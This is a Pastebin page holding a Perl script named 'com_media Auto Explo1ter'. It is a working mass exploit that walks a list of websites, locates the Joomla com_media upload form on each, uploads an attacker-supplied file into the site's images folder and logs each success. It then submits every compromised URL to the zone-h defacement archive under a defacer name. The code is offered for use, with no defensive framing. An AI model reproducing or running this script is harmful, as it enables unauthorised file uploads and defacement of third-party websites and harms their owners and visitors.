API tools faq
paste
3xploit3r

com_media Auto Explo1ter

3xploit3r
Aug 24th, 2016
270
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.33 KB | None | 0 0
raw download clone embed print report diff
  1. #!/usr/bin/perl
  2. #                        ->Coder By CrashBandicot
  3. #                        ->sh00tz<- Magnom , m0sta , hamid , samim , Yunus, Ghosty
  4. #                        -> Coded in Fast , Design not really good :/
  5.  
  6. use LWP::UserAgent;
  7. use HTTP::Request::Common;
  8. if ($^O =~ /Win/) { system("cls"); } else { system("clear"); }
  9. print "
  10.                  
  11.               Com_media Auto Explo!ter
  12.               by CrashBandicot        
  13.  
  14.         Usage : $0 list.txt file.jpg or file.txt
  15.  
  16. \n";
  17.  
  18. $file = $ARGV[1];
  19. unless ($file) {
  20.  
  21.     print "\n\n !!! Usage : $0 list.txt file.jpg or file.txt !! \n\n";
  22.     exit;
  23. }
  24. open(tarrget,"<$ARGV[0]") or die "$!";
  25. while(<tarrget>){
  26. chomp($_);
  27. $webs = $_;
  28. if($webs !~ /http:\/\//)
  29. {
  30. $webs = "http://$webs";
  31. }
  32. $zeeb = $webs."/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=";
  33.  
  34. print " [+] Scanning -> $webs";
  35.  
  36. $ua = LWP::UserAgent->new;
  37. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
  38. $fucki = $ua->get($zeeb);
  39. $kzz = $fucki->content;
  40. if($kzz =~/<form action="(.*?)" id=\"uploadForm\" class=\"form-horizontal\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ || $kzz =~ /<form action="(.*?)" id=\"uploadForm\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ )
  41. {
  42.     print "\n\n [+] Try Upload >> $webs"; sleep(1);
  43.  
  44. $url = $1;
  45. $url =~ s/&amp;/&/gi;
  46.  
  47. } else { print "\n\n [-] com_media not found -> $webs"; sleep(1); }
  48.  
  49. my $res = $ua->post($url, Content_Type => 'form-data', Content => [ Filedata => [$file] ]);
  50.  
  51. $shell = $webs."/images/".$file;
  52.  
  53. $check = $ua->get($shell);
  54. if($check->content =~/by/ || $check->is_success ) {
  55.  
  56.     print "\n\n  [+] File Uploaded >> $shell\n";
  57.  
  58. open(save ,">>save.txt");
  59. print save "$shell\n";
  60. close save;
  61.  
  62. $res= $ua->post("http://zone-h.org/notify/single",[
  63.                 'defacer'     => 'name of defacer here',
  64.                 'domain1'   => $shell,
  65.                 'hackmode' => '15',
  66.                 'reason'       => '1',
  67.                 'submit'       => 'Send',
  68.                 ]);
  69.                 if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
  70.                 print "\n    [+] Submit zone-h $1\n"; sleep(1);
  71.                 }
  72.                 else
  73.                 {
  74.                 print "\n    [-] Submit zone-h ERROR\n"; sleep(1);
  75.                 }
  76.  
  77. } else {  print "\n\n [-] File Upload Fail";   }
  78.  
  79.  
  80. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!